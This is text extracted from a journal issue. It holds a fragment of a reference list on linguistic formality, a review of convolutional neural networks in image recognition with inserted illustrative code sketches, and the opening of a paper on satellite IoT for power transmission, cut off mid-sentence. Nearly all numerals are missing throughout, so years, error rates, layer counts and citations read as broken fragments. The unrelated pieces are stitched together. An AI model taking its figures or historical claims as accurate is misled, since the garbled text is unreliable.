magnini. . the pascal recognising textual entail- ment challenge. in machine learning challenges. evaluating predictive uncertainty, visual object classification, and recognising textual entail- ment, pages – . springer. cristian danescu-niculescu-mizil, michael gamon, and susan dumais. . mark my words!: lin- guistic style accommodation in social media. in proceedings of the th international conference on world wide web, pages – . acm. cristian danescu-niculescu-mizil, lillian lee, bo pang, and jon kleinberg. . echoes of power: language effects and power differences in social interaction. in proceedings of the st international conference on world wide web, pages – . acm. cristian danescu-niculescu-mizil, moritz sudhof, dan jurafsky, jure leskovec, and christopher potts. . a computational approach to polite- ness with application to social factors. proceedings of the st annual meeting of the association for computational linguistics (volume : long pa- pers), pages – , august. birgit endrass, matthias rehm, and elisabeth andré. . planning small talk behavior with cultural influences for multiagent systems. com- puter speech & language, ( ): – . alex chengyu fang and jing cao. . adjec- tive density as a text formality characteristic for automatic text classification: a study based on the british national corpus. in proceedings of the rd pacific asia conference on language, infor- mation and computation, pages – , hong kong, december. city university of hong kong. 
rachele de felice and paul deane. . identifying speech acts in e-mails: toward automated scoring of the toeic r© e-mail task. ets research report series, ( ):i– . guy fielding and colin fraser. . language and interpersonal relations. the social context of lan- guage, pages – . francis heylighen and jean-marc dewaele. . formality of language: definition, measurement and behavioral determinants. interner bericht, center “leo apostel”, vrije universiteit brüssel. eduard hovy. . generating natural language under pragmatic constraints. journal of pragmat- ics, ( ): – . judith t. irvine. . formality and informality in communicative events. american anthropologist, ( ): – . w. lewis johnson, richard e. mayer, elisabeth andré, and matthias rehm. . cross-cultural evaluation of politeness in tactics for pedagogical agents. in aied, volume , pages – . raquel justo, thomas corcoran, stephanie m. lukin, marilyn walker, and m. inés torres. . extracting relevant knowledge for the de- tection of sarcasm and nastiness in the social web. knowledge-based systems, : – . foaad khosmood and marilyn walker. . grapevine: a gossip generation system. in pro- ceedings of the fifth international conference on the foundations of digital games, pages – . acm. j. peter kincaid, robert p. fishburne jr., richard l. rogers, and brad s. chissom. . derivation of new readability formulas (automated readabil- ity index, fog count and flesch reading ease for- mula) for navy enlisted personnel. technical re- port, dtic document. vinodh krishnan and jacob eisenstein. . you’re mr. lebowski, i’m the dude: inducing address term formality in signed social networks. proceedings of the conference of the north american chapter of the association for compu- tational linguistics: human language technolo- gies, pages – , may–june. shibamouli lahiri, prasenjit mitra, and xiaofei lu. . informality judgment at sentence level and experiments with formality score. in computa- tional linguistics and intelligent text processing, pages – . springer. shibamouli lahiri. . squinky! a corpus of sentence-level formality, informativeness, and im- plicature. arxiv preprint arxiv: . . haiying li, zhiqiang cai, and arthur c. graesser. . comparing two measures for formality. in the twenty-sixth international flairs confer- ence. françois mairesse and marilyn a. walker. . controlling user perceptions of linguistic style: trainable generation of personality traits. com- putational linguistics, ( ): – . françois mairesse. . learning to adapt in dia- logue systems: data-driven models for personality recognition and generation. ph.d. thesis, univer- sity of sheffield, united kingdom. alejandro mosquera and paloma moreda. a. a qualitative analysis of informality levels in web . texts: the facebook case study. in proceedings of the lrec workshop:@ nlp can u tag #user generated content, pages – . alejandro mosquera and paloma moreda. b. smile: an informality classification tool for help- ing to assess quality and credibility in web . texts. in proceedings of the icwsm workshop: real-time analysis and mining of social streams (ramss). kate g. niederhoffer and james w. pennebaker. . linguistic style matching in social interac- tion. journal of language and social psychology, ( ): – . ellie pavlick and ani nenkova. . inducing lex- ical style properties for paraphrase and genre dif- ferentiation. 
in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , denver, colorado, may–june. association for computational linguistics.
kelly peterson, matt hohensee, and fei xia. . email formality in the workplace: a case study on the enron corpus. in proceedings of the workshop on language in social media (lsm ), pages – , portland, oregon, june. association for computational linguistics.
nils reiter and anette frank. . identifying generic noun phrases. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala, sweden, july. association for computational linguistics.
priya sidhaye and jackie chi kit cheung. . indicative tweet generation: an extractive summarization problem? proceedings of the conference on empirical methods in natural language processing.
robert j. sigley. . text categories and where you can stick them: a crude formality index. international journal of corpus linguistics, ( ): – .
sangweon suh, harry halpin, and ewan klein. . extracting common sense knowledge from wikipedia. in proceedings of the workshop on web content mining with human language technologies at iswc, volume .
marilyn a. walker, jean e. fox tree, pranav anand, rob abbott, and joseph king. . a corpus for research on deliberation and debate. the international conference on language resources and evaluation, pages – .

international journal of advanced network, monitoring and controls, volume , no. , doi: . /ijanmc- -

research on the application of convolutional neural networks in image recognition

gu hongxian, school of computer science and engineering, xi'an technological university, xi'an, china; state and provincial joint engineering lab of advanced network, monitoring and control, xi'an, china
liu bailin, school of computer science and engineering, xi'an technological university, xi'an, china; state and provincial joint engineering lab of advanced network, monitoring and control, xi'an, china
gao zhiyu, school of computer science and engineering, xi'an technological university, xi'an, china
mu jing, school of computer science and engineering, xi'an technological university, xi'an, china

abstract—over the past few years, benefiting from the strong feature extraction advantages of convolutional neural networks (cnn) themselves and the efforts and applications made by researchers, research work on cnn in the field of image recognition has yielded many results and achieved the best performance in classification and regression tasks. this paper focuses on the improvement and application history of cnn and summarizes the directions of improvement and optimization of cnn in recent years from the perspective of the structure of cnn themselves and their applications in various fields. finally, this review closes with a further outlook on the development direction of cnn.

keywords-image recognition; deep learning; machine learning; convolutional neural networks

i. introduction

since the concept of deep learning was proposed by hinton et al.[ ] in , machine learning has, over more than a decade of development, moved closer to the original goal of "artificial intelligence".
deep learning is a hierarchical machine learning approach that involves multiple levels of nonlinear transformations which learn the inherent laws and representation levels of sample data, and the feature information obtained in the process of learning can help the machine make analytical judgments about the data. compared to traditional machine learning methods, it has achieved good results in search technology, image recognition, machine translation, natural language processing, multimedia learning, speech, recommendation and personalization technologies. with the practice of researchers in various fields, many network models have been proposed, such as dbn (deep belief network), cnn (convolutional neural network), rnn (recursive neural network), etc.

the introduction of cnn into the field of image recognition took researchers a long time of exploration and practice. image recognition technology originated in the s, when it did not develop rapidly due to inadequate technology and hardware facilities. it was not until the s that artificial neural networks combined with support vector machines (svm) facilitated the development of image recognition technology, which became widely used. however, traditional image recognition techniques are based on shallow structural models, which require human pre-processing of the image, resulting in reduced accuracy of image recognition. as computer hardware and gpus evolved, researchers began to work on deeper network structures, and in , krizhevsky et al. reduced the top- error rate to . % in imagenet's large-scale visual recognition challenge competition based on cnn, . % lower than the top- error rate of the second-place team, showing the great potential of deep models. in the following years, cnn have made leaps and bounds in digital image recognition and processing with their powerful feature extraction capabilities.

ii. overview of cnn

cnn, compared to other network models, are better able to adapt their structures to image structures while extracting features and classifying them, with outstanding performance in image processing. in addition, the weight sharing feature reduces the training parameters of the network, which makes the network structure simpler and more generalizable, and cnn have become a current research hotspot.

a. development history

the prototype of the cnn is the bp algorithm proposed by rumelhart in [ ]. in the s, lecun proposed the lenet- model[ ], which was mainly applied to image classification of handwritten numbers, used the stochastic gradient descent method and back-propagation for supervised training of the cnn, and achieved the best recognition results on the mnist dataset[ ], laying the foundation of modern cnn. in , hinton proposed the concept of deep learning in his paper and pointed out that neural networks with multiple hidden layers have better feature learning capabilities and that their training complexity can be effectively mitigated by layer-by-layer initialization[ ].
in the next few years, the development of cnn also had some achievements, thanks to substantial updates of computer hardware and the rapid development of gpus. in , in the imagenet competition, the model based on cnn took first place with an accuracy rate % higher than the second place, and cnn were once again pushed into a deep research boom by scholars. in , the computer vision group of oxford university and google deepmind jointly developed vggnet[ ], which won first and second place in the imagenet competition respectively. in , kaiming he et al. proposed the residual neural network resnet[ ], which solves the problem of deep networks being difficult to train by fitting the residual term with cross-layer connections. although the number of network layers reaches , the complexity is lower and the top- error rate on imagenet is only . %.

b. basic structure and working principle

the basic building blocks of a cnn are neurons, containing weights with learning ability and bias constants. when multiple neurons are combined in a hierarchical structure, a neural network model is formed. a figurative representation of both is shown in figure .

figure . neurons and neural networks: (a) neurons, (b) neural networks.

cnn models are neural network models that contain feature extractors consisting of convolutional and pooling layers. a typical network structure is shown in figure , which includes five parts: input layer, convolutional layer, pooling layer, fully connected layer, and output layer. among them, the convolutional layer and the pooling layer are the core modules realizing the feature extraction function of convolutional neural networks.

figure . typical structure of a cnn.

cnn is a multilayered supervised learning neural network structure with the following workflow. a series of pre-processing operations are performed on the data at the input layer, such as data normalization, de-normalization, etc. entering the convolutional layer, the image of the input layer is convolved with a convolutional kernel, and then the activation function outputs the feature map of the layer, which is expressed as ( ):

$x_j^{l} = f\left(\sum_{i \in M_j} x_i^{l-1} * k_{ij}^{l} + b_j^{l}\right)$  ( )

wherein $f$ represents the activation function, $M_j$ represents the set of input maps participating in the current convolutional layer operation, $x_i^{l-1}$ represents the value of a pixel of the image input to the current layer, $*$ represents the convolution operation, $k_{ij}^{l}$ represents the weight vector of the layer-$l$ convolutional kernel, and $b_j^{l}$ represents the bias term of layer $l$. currently the commonly used activation functions are the sigmoid function, tanh function, relu function, etc.[ ]. connecting the pooling layer after the convolutional layer allows a certain degree of feature invariance and can reduce the amount of data. the input feature map is split into non-overlapping regions in this layer, and for each subregion features are further extracted by pooling operations, the common pooling operations being average pooling and maximum pooling. after a number of alternating convolutional and pooling layers, multiple sets of highly abstracted feature maps are obtained; then the fully connected layers are entered and the multiple sets of feature maps are combined into one feature map. then, based on business needs, the classification or identification results are finally output.
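to make the convolution-plus-pooling workflow concrete, here is a small illustrative sketch (not code from the paper) of a single convolutional layer with a relu activation followed by max pooling, written directly in numpy; the kernel values and the input image are made up.

```python
import numpy as np

def conv2d(image, kernel, bias=0.0):
    """valid 2d convolution of a single-channel image with one kernel
    (implemented as cross-correlation, as is standard in cnn frameworks)."""
    kh, kw = kernel.shape
    oh, ow = image.shape[0] - kh + 1, image.shape[1] - kw + 1
    out = np.zeros((oh, ow))
    for i in range(oh):
        for j in range(ow):
            out[i, j] = np.sum(image[i:i + kh, j:j + kw] * kernel) + bias
    return out

def relu(x):
    return np.maximum(x, 0.0)

def max_pool(feature_map, size=2):
    """non-overlapping max pooling over size x size regions."""
    h, w = feature_map.shape
    h, w = h - h % size, w - w % size          # drop edge rows/cols that do not fit
    fm = feature_map[:h, :w].reshape(h // size, size, w // size, size)
    return fm.max(axis=(1, 3))

# made-up 6x6 input image and a 3x3 vertical-edge kernel
image = np.arange(36, dtype=float).reshape(6, 6)
kernel = np.array([[1., 0., -1.],
                   [1., 0., -1.],
                   [1., 0., -1.]])

feature_map = relu(conv2d(image, kernel, bias=0.1))   # convolutional layer output
pooled = max_pool(feature_map, size=2)                 # pooling layer output
print(feature_map.shape, pooled.shape)                  # (4, 4) (2, 2)
```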
the goal of training is to minimize the loss function of the network, so the weights and biases of each layer need to be constantly updated during training. common loss functions are the mean squared error (mse) function, the negative log likelihood (nll) function, etc. in practice, in order to reduce the occurrence of overfitting, the loss function adds an l regularization term on the weights, with a parameter λ to control the strength of the regularization effect, as in ( ):

$E = E_0 + \frac{\lambda}{2n}\sum_{w} w^{2}$  ( )

where $E_0$ is the original loss and $n$ is the number of training samples. the weights and biases are updated as ( ) and ( ):

$W^{l} \leftarrow W^{l} - \eta \frac{\partial E}{\partial W^{l}}$  ( )

$b^{l} \leftarrow b^{l} - \eta \frac{\partial E}{\partial b^{l}}$  ( )

where $\eta$ is the learning rate.

c. significance of the study

cnn have been so successful in a number of applications that researchers have moved on to other areas, which brings more challenges. in terms of the cnn itself, that is where the research comes in.

1) refinement of the theoretical system through domain application effects. cnn have undergone more than years of bumpy development, from mp models and bp neural networks to the various deep learning networks that are popular nowadays; all of them are judged directly by experimental effects, and there has been no complete set of theories for the mathematical verification of these methods. thus, as the field of application of cnn expands, it will also promote theoretical research in the field of cnn to a certain extent.

2) facilitating the optimization of neural network structures and extending their application value. at present, cnn have a place in natural language processing, image recognition, speech processing and other fields, and their trend is positive. however, such networks still have the problems of gradient disappearance, training sample size limits and computing power limits, which are the short boards of their development. for the problem that networks are difficult to train, an analysis of the related problems is also given in the literature[ ], but the solutions given have not become mainstream. therefore, there is an urgent need to improve the learning capabilities of deep neural networks, so that the networks have better generalization capabilities and can be adapted to more complex application scenarios.

iii. improvement and optimization of cnn

in recent years, improvements in cnn have been driven primarily by factors such as final detection effectiveness, network operating efficiency, and computational complexity. as of now, the improvement and optimization of cnn are mainly considered in three aspects: network depth, network structure, and network training methods.

a. network depth

lecun et al. designed the lenet network[ ], which uses alternately connected convolutional and pooling layers and eventually passes through fully connected layers. there are layers in lenet, and lenet became the originator of cnn. in , krizhevsky proposed alexnet[ ], a network model with five convolutional layers, some of which are followed by a pooling layer for downsampling, and finally two fully connected layers. the last layer is the softmax output layer, with nodes corresponding to the image classifications in the imagenet image set; using the dropout mechanism and the relu function improved the accuracy and training time. subsequently, the vggnet proposed by karen et al.
uses almost all × convolutional kernels, while adding pooling layers after several convolutional layers instead of pooling immediately after each convolutional layer, to guarantee the depth of the network in many ways. vggnet[ ] demonstrated that increasing the number of network layers is beneficial for improving the accuracy of image classification. this increase is not unlimited, and too many layers can create network degradation problems. the number of layers of vggnet was finally determined in two versions, with and layers. in the following years, different teams of researchers proposed googlenet ( layers) and resnet ( layers); they all deepened the network and obtained better and better results. in terms of network depth alone, increasing the network level has an effect on the learning effect of convolutional neural networks, which also confirms the need for deeper learning.

b. improvements of the network structure

improvements to the network structure mainly revolve around the idea of reducing network complexity. in , google proposed googlenet[ ], whose main innovation is the inception mechanism, which sets up different convolutional kernels in the same layer, i.e., multi-scale processing of images, and adds a * convolutional kernel before the * and * kernels for dimensionality reduction, which reduces parameters and improves the accuracy of image recognition on imagenet datasets by about %. in , springenberg j t et al. proposed a fully convolutional structure in the literature[ ]. instead of the classical pairing of alternating convolutional and pooling layers in a classical convolutional neural network, a strided convolutional layer is used as the feature extraction layer in this structure. it was found that the error rate of this new network structure was reduced by percentage points compared to traditional convolutional neural networks, and it was found that in some cases the addition of a pooling layer to this network structure resulted in weakened performance. lin m et al. proposed a network-in-network structure in the literature network in network[ ], which is a subversion of the traditional structure of convolutional neural networks. the structure replaces the fully connected layer with a global average pooling layer, allowing the input feature map to be classified directly at the output, improving performance. however, this structure makes the convergence process longer and, on the whole, is not a very effective network structure. the google deepmind team proposed a self-contained transformation module to flexibly and efficiently extract image-invariant features[ ]; the specific structure of the module is shown in figure . the model, named spatial transformer, is mainly composed of three parts: localization network, grid generator and sampler. the localization network uses the input feature map and outputs spatial transformation parameters through multiple hidden layers; the grid generator uses the predicted transformation parameters to create a sampling grid; the sampler uses the feature map and the sampling grid as inputs to generate the output map from the grid points.

figure . invariant image feature extraction (spatial transformer module).

this model is used to good effect: it is a self-contained module that can be added anywhere in the network structure (not just in cnn), with no limits. it is easy to differentiate and can be used directly for end-to-end training.
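as a compact illustration of the three components named above, here is a sketch (not the deepmind implementation) of a spatial transformer for single-channel inputs, assuming pytorch; the layer sizes and input shape are arbitrary.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class SpatialTransformer(nn.Module):
    """localization network -> grid generator -> sampler, for 1 x 28 x 28 inputs."""
    def __init__(self):
        super().__init__()
        self.loc_features = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 32), nn.ReLU())
        self.loc_params = nn.Linear(32, 6)   # regresses the 6 affine transformation parameters
        # initialize to the identity transform so training starts from "no warping"
        self.loc_params.weight.data.zero_()
        self.loc_params.bias.data.copy_(torch.tensor([1., 0., 0., 0., 1., 0.]))

    def forward(self, x):
        theta = self.loc_params(self.loc_features(x)).view(-1, 2, 3)   # localization network
        grid = F.affine_grid(theta, x.size(), align_corners=False)     # grid generator
        return F.grid_sample(x, grid, align_corners=False)             # sampler

x = torch.randn(4, 1, 28, 28)
print(SpatialTransformer()(x).shape)   # torch.Size([4, 1, 28, 28])
```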
its easy-to-differentiate and fast nature allows it to be added to the structure without slowing down the original network. the features extracted by this method are more general than those of conventional structures. shanshan xu[ ] proposed an algorithm for progressively extending the network structure of a convolutional neural network to optimally adjust the network structure so that the network suits the real-world problem, and at the same time proposed an improved feature extraction method so that feature extraction does not happen on its own in the network. this method was applied to handwritten number recognition, and the experimental results showed that the recognition accuracy and recognition efficiency were higher than those of other algorithms using the classification method of convolutional neural networks.

c. methods of network training

1) adding the dropout mechanism[ ] to eliminate overfitting. the dropout proposed by hinton et al. effectively improves the generalization performance of the network by randomly ignoring a certain percentage of node responses during training, compared to traditional fully connected neural networks. however, the performance improvement of dropout for convolutional neural networks is not significant, mainly because convolutional neural networks greatly reduce the number of training parameters compared to fully connected networks due to the weight sharing properties of convolutional kernels, which itself avoids the more severe overfitting phenomenon. based on the idea of dropout, wan et al.[ ] proposed the drop connect approach. unlike dropout, which ignores some of the node responses of the fully connected layer, drop connect randomly disconnects a certain percentage of the connections of the neural network's convolutional layer. for convolutional neural networks, drop connect, which acts on the convolutional layer, has a much stronger ability to counter overfitting than dropout, which acts on the fully connected layer. although the layers that dropout and drop connect act on are different, the underlying principle of both is to increase the sparsity or randomness of network connections during training in order to eliminate overfitting and improve network generalization capabilities.

2) training methods using knowledge transfer. overfitting and gradient dispersion are prone to occur when training conventional convolutional neural networks. a training strategy using knowledge migration was proposed by rocco et al. in the literature[ ]. pre-training with soft targets (pst) is first performed (a soft target is a class distribution containing information between sample classes), and the migration of the soft target from the source model to the target model in the same domain allows more supervisory information to be obtained from a limited sample than from a single label, solving the problem of missing samples. then the adjacent convolutional layers of the target model are divided into modules to learn the low-level features of the source model in a modular way, similar to dbn's layer-by-layer pre-training strategy. with the combination of mmt and pst, the sample class information and the low-level features are migrated at the same time, so that the model converges to a better position; the sgd algorithm is then used for fine-tuning, so that the generalization performance is greatly improved.
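as a small illustration of the difference between the two mechanisms discussed above, the following numpy sketch (not from the cited papers) applies inverted dropout to a layer's activations and dropconnect-style masking to its weights; the rates, shapes, and toy layer are arbitrary.

```python
import numpy as np

rng = np.random.default_rng(0)

def dropout(activations, rate=0.5, training=True):
    """inverted dropout: randomly zero activations and rescale the survivors."""
    if not training or rate == 0.0:
        return activations
    mask = rng.random(activations.shape) >= rate
    return activations * mask / (1.0 - rate)

def drop_connect(weights, rate=0.5, training=True):
    """dropconnect-style masking: randomly zero individual weights (connections)."""
    if not training or rate == 0.0:
        return weights
    mask = rng.random(weights.shape) >= rate
    return weights * mask / (1.0 - rate)

# toy fully connected layer: 4 inputs -> 3 outputs, relu activation
x = rng.normal(size=(1, 4))
w = rng.normal(size=(4, 3))

h_dropout = np.maximum(dropout(x) @ w, 0.0)            # dropout applied to the activations
h_dropconnect = np.maximum(x @ drop_connect(w), 0.0)   # dropconnect applied to the weights
print(h_dropout, h_dropconnect)
```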
iv. application of cnn in image recognition image classification is an image processing technique that identifies different objects from the characteristic information contained in an image. with the rise of machine learning, automatic image classification techniques have been applied in many fields. cao, in the literature[ ], used the classical convolutional neural network vgg- as a prototype and added a multi-scale sampling layer at the end of the convolutional part, so that the model can take images of any size for training and testing, while reducing the number of neurons in the fully connected layer; this improves the training speed of the model while preserving accuracy, and the model was applied to the problem of multi-attribute classification of human faces. in the literature[ ], wenxu shi proposed a cnn-based multi-scale approach combined with a deconvolutional-network feature extraction algorithm (msdcnn) and used it to classify adenocarcinoma pathology images. classification experiments on adenocarcinoma pathology cell images showed that the msdcnn algorithm improved the classification accuracy at the final convolutional feature scale by about % over the conventional cnn algorithm and by about . % over the classification accuracy of the fusion network model approach, which is also based on multi-scale features. in the literature[ ], chunlei zhang proposed a parallel network model based on convolutional neural networks for military target image classification. the method uses two edge detection operators to extract the target image features separately and then feeds them into the convolutional neural network for deep feature extraction, which improves the classification recognition rate by . % compared to the conventional convolutional neural network, reaching %. the theoretical analysis and experimental data show that the model can effectively distinguish military target image data, which is important for the accurate provision of military operational information. target detection is a fundamental problem in machine vision and artificial intelligence; its main goal is to pinpoint the category and bounding-box location of the various targets in an image. target detection algorithms based on convolutional neural networks, such as rcnn, fast rcnn, faster rcnn and mask rcnn, are widely used in security monitoring, intelligent transportation, image retrieval and other fields. a target detection algorithm based on multi-scale feature extraction was proposed by jianghao rao in the literature[ ] and applied to the detection of small infrared pedestrian targets, with better results than conventional networks. a mask-rcnn-based method for building target detection was proposed by dajun li et al. in the literature[ ]. in the literature[ ], ding peng "fine-tuned" a variety of mainstream deep convolutional neural networks based on faster rcnn detectors on two classical data sets for target detection in optical remote sensing images. for the problem of target detection on traffic roads, zhang qi et al. proposed, in the literature[ ], a traffic target detection method based on anchor point clustering, an all-anchor-point training strategy and a strengthened intersection-over-union ratio (siou). v.
conclusion this paper describes the basic structure of classical cnn from the development of cnn, briefly analyzes the features of cnn that have been improved and optimized in the development process, and finally elaborates on the wide application of cnn in the field of image classification and target detection. cnn have been developed to date and occupy an important position in the field of image recognition. in terms of current trends, cnn will continue to evolve and makecnnsuitable for various application scenarios, such as d cnn facing video understanding. there are also challenges, such as limited data sets, network generalization performance, robustness to be improved, and high training costs. the aforementioned issues will be a direct driver for the future development of convolutional neural networks and will directly contribute to the further deepening of artificial intelligence. acknowledgment this work is supported by the natural science foundation of shaanxi province( jm- ). references [ ] hinton g e, salakhutdinov r r , reducing the dimensionality of data with neural networks[j].science, , ( ): - . [ ] rumelhart d e, hinton g e, williams rj. learning representations by back-propagating errors[j].nature, , : - . [ ] y. lecun, l. bottou, y. bengio, and p. haffner. gradient-based learning applied to document recognition. proceedings of the ieee, november . [ ] lecun y, cortea c. mnist handwritten digit database[eb/ol].http://yann.lecun.com/exdb/mnist, . [ ] k. simonyan and a. zisserman. very deep convolutional networks for large-scale image recognition. [ ] he k, zhang x, ren s, et al. deep residual learning for image recognition[eb/ol].http://arxiv.org/abs/ . , . [ ] gu jiu-xiang, wang zhen-hua, jason kuen,etal. recentadvances in convolutional neural networks. arxiv: . v , . [ ] x. glorot, y. bengio. understanding the difficulty of training deep feedforward neural networks. aistats, international journal of advanced network, monitoring and controls volume , no. , [ ] lecun y, boser b, denker j s, etal. back propagation applied to handwritten zip code recognition[j]. neural computation, , ( ): - . [ ] krizhevsky a,sutskever i,hinton g e.imagenet classifi-cation with deep convolutional neural networks[c]//advances in neural information processing systems, : - . [ ] bengio y,simard p,frasconi p.learning long-term depen-dencies with gradient descent is difficult[j].ieee transac-tions on neural networks, , ( ): - . [ ] christian szegedy, wei liu, yangqing jia, pierre sermanet, scott reed, dragomir anguelov, dumitru erhan, vincent vanhoucke, andrew rabinovich, going deeper with convolutions, arxiv link: http://arxiv.org/abs/ . . [ ] rougui j e, istrate d, souidene w, et al. audio based sur-veillance for cognitive assitance using a cmt microphonewithin socially assistive living [j]. , ( ): - .] [ ] lin, min, qiang chen, and shuicheng yan. network in network. arxiv preprint arxiv: . [ ] zang d, chai z, zhang j, et al. vehicle license plate recog-nition using visual attention model and deep learning[j].journal of electronic imaging, , ( ): . [ ] xv shanshan. research and application of convolutional neural network [d]. nanjing forestry university, . [ ] hinton g e, srivastava n, krizhevsky a, et al. improving neural networks by preventing co-adaption of feature detectors[ R /ol].[ - - ]. http: / / arxiv. org / pdf / . v . [ ] wan l, zeiler m, zhang s, et al. regularization of neural networks using drop connect [c] / / proceedings of the inter-national conference on machine learning. 
new york: acm press, : - . [ ] luo ke, zhou anzhong,luo xiao. a convolutional neural network training strategy using knowledge transfer[j]. control and decision-making, , ( ) : - . [ ] cao ge. research on face image classification application based on deep convolutional neural network [d]. jilin university, . [ ] shi wenxu, jiang jinhong, bao shengli. application of improved convolutional neural network in pathological image classification of adenocarcinoma[j]. science, technology and engineering, , ( ) : - . [ ] zhang chun-lei. military target image classification technology based on parallel convolutional neural network[j]. electronic design engineering, , ( ) : - . [ ] rao jianghao. target identification, positioning and detection based on cnn integration [d]. university of chinese academy of sciences (institute of optoelectronic technology, chinese academy of sciences), . [ ] li dajun, he weilong, guo bingxuan,li maosen, chen minqiang. building target detection algorithm based on mask - rcnn[j]. science of surveying and mapping, , ( ) : - . [ ] dingpeng. research on optical remote sensing target detection technology based on deep convolutional neural network [d]. university of chinese academy of sciences (changchun institute of optics, precision mechanics and physics, cas), . [ ] zhang qi, ding xintao, wang wanjun, szhou wen. traffic target detection method based on faster rcnn [j]. journal of west anhui university, , ( ) : - . http://www.elecfans.com/tags/pi/ http://arxiv.org/abs/ . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - internet of things application in satellite communication in power transmission, transform and distribution dong chuang shaanxi huabiao network technology co., ltd. xi’an, , china e-mail: james @ .com abstract—in the national grid enterprise system, the geographical environment of transmission, substation lines and equipment distribution is very complicated. transmission lines and substation equipment built in complex environments such as plateaus, forests, canyons and borders are often subjected to earthquakes, floods and blizzards. the threat of mudslide disasters, the ground communication network is greatly affected by extreme natural disasters, and it is impossible to repair and rescue in time when disasters occur. in response to the needs of facility operation and maintenance under emergency anomalies, tiantong no. satellite is a communication satellite with independent intellectual property rights in china. it has functions such as voice communication, image transmission, positioning, and data reporting. it can set up satellite internet of things to realize real-time monitoring and equipment. conveniences such as inspections and emergency rescues reduce the operation and maintenance costs of the power transmission and transformation process. keywords-tiantong satellite; audio and video transmission; inspection; satellite ground station; ground network i. introduction the ubiquitous electricity internet of things connects people , things and power users , power grid enterprises ,power generation enterprises , suppliers and their equipment to generate shared data for users, the grid, power generation, and suppliers and government social services; use the power grid as a hub, play a platform and sharing role, create value for the development of the industry and more market players, and provide value services. 
the essence of the ubiquitous electric power internet of things is to fully apply modern information technologies such as "big data, cloud platforms, the internet of things, mobile internet, artificial intelligence" to create a smart service system with comprehensive status perception, efficient information processing, and convenient and flexible application in january , the state grid first proposed the strategic goal of “three types (hub type, platform type, shared type) two networks (strong smart grid, ubiquitous electricity internet of things)” in the “two sessions” report, and proposed the construction the important material foundation of a world-class energy internet company is to build and operate the "two networks." in march , the state grid clarified the definition of the ubiquitous electric power iot for the first time at a teleconference on the deployment of ubiquitous electric power iot construction work, and proposed a two-phase strategic arrangement for the construction of the next five years. the most urgent and important task is to accelerate the construction of the ubiquitous electric power internet of things. at present, a large number of devices and applications have been developed in the application layer, platform layer, network layer and perception layer. such iot devices have been deployed in areas covered by terrestrial networks with stable business international journal of advanced network, monitoring and controls volume , no. , capabilities and reasonable use costs. the development of services in areas without ground network signal coverage urgently needs to be improved, and current ground network and iot equipment cannot support this demand. due to the characteristics of the satellite network: covering no dead zones, communication distance has nothing to do with cost, convenient networking, safe and reliable communication, and can be used as a last-guaranteed communication method in the event of ground network paralysis caused by earthquakes, floods, and snowstorms, particularly suitable as a supplementary application in the power industry. the ubiquitous electric power internet of things-related services, in areas where there is no ground network signal coverage, or where new ground networks cover higher cost areas, the most effective technical implementation is achieved by satellite communications using satellites as relays. ubiquitous power satellite iot solution. the application of satellites to electricity is accompanied by the rapid development of satellite networks, combined with the objective communication needs of the power industry in areas without ground network coverage. the ubiquitous power satellite iot will be an extension and supplement of the ubiquitous power iot. add satellite communication capabilities on the basis of existing power iot equipment to ensure that it meets the needs of power applications and expands the use of locations and scenarios. in short, it extends from areas with terrestrial networks to areas without ground network coverage. this article will analyze the application of ubiquitous power satellite iot in the power system's power generation, transmission, substation distribution and power consumption process. ii. overview of satellite communications iot technology support a. 
satellite communications overview satellite mobile communication refers to the use of artificial earth satellites as relay stations to forward the radio waves used for communication between mobile users, or between mobile users and fixed users, so as to achieve mobile communication between two or more points. satellite communications generally use the l, s, c, x, ku, and ka frequency bands, while high-throughput satellites generally use the c, ku, and ka frequency bands. however, resources in the c and ku bands are tight, so high-throughput satellites are increasingly moving towards the ka band, where frequency resources are more abundant. a typical satellite mobile communication system includes a space segment, a ground segment and a user segment. the space segment is composed of one or more satellite constellations; acting as a communication relay station, it provides the connection between the network users and the gateway. the ground segment usually includes the gateway stations, the network control center and the satellite control center, which are responsible for the operation of the system. the user segment is composed of various user terminals, of which there are mainly two types: mobile terminals and handheld terminals. new satellite technology has developed rapidly, and there are many mature commercial systems, such as tiantong, high-throughput satellites, iridium, etc. there are also many newcomers who plan to launch thousands of satellites and put them into operation in the next few years. the basic composition of a satellite communication link is shown in figure . figure . basic composition of satellite communication link. b. satellite communication applications mobile satellite communication is an effective complement to terrestrial cellular mobile communication. in addition to the characteristics of mobile communications, it also has the inherent advantages of satellite communications, including: ① long communication distances, large coverage areas, and multi-address connectivity. a geosynchronous orbit communication satellite can cover % of the earth's surface, the maximum communication distance between two points on the ground is about km, and all earth stations in the area covered by the satellite can use the same satellite to communicate with each other. ② large communication capacity and many types of transmission services. typical communication satellites have a capacity of tens to hundreds of megabits per second and can serve hundreds of video channels or tens of thousands of voice and data links. ③ good communication quality and a low line bit error rate. since the radio waves of mobile satellite communications mainly propagate in space beyond the atmosphere, the propagation characteristics are relatively stable and are not easily affected by natural conditions and interference. the normal operating rate of satellite communications is above . %, and the transmission quality is high. ④ "communication on the move" for mobile platforms can be realized. the users of mobile satellites are diverse: satellite terminals can be mounted on mobile carriers located on the ground, at sea, in the air or even in space, and can be combined with terrestrial cellular mobile communication systems and other communication systems to form a seamless communication network with global coverage.
in addition to the above advantages, satellite mobile communication also has the following constraints: ① the size, weight and power consumption of mobile terminal equipment are limited, the size and shape of the antenna are limited by the installed carrier (such as aircraft, cars, ships, etc.), handheld terminals the requirements are even more demanding. ② the satellite antenna beam should be able to adapt to changes in the ground coverage area and keep pointing. the antenna beam of the user's mobile terminal should be able to keep pointing to the satellite as the user moves, or an omnidirectional antenna beam. ③ due to the movement of the mobile body, when the link between the mobile terminal and the satellite transponder is blocked, a “shadow” effect will occur, causing communication to be blocked. ④ a satellite constellation system composed of multiple satellites requires the establishment of inter-satellite communication links and on-board processing and on-board exchanges, or the establishment of a gateway station with exchange and processing capabilities. c. development status of satellite communication system ) tiantong satellite the tiantong- satellite mobile communication system is composed of a space segment, a ground segment and a user terminal, and the space segment is planned to consist of multiple geosynchronous orbit communication satellites. as the first star of china’s satellite mobile communication system, tiantong- was launched on august , . it belongs to china international journal of advanced network, monitoring and controls volume , no. , satellite communications group co., ltd. it is mainly developed by china academy of space technology and uses new plastic antennas. new equipment and technologies such as stand-alone integrated technology, the communication frequency is designed in the s band, and the cellular 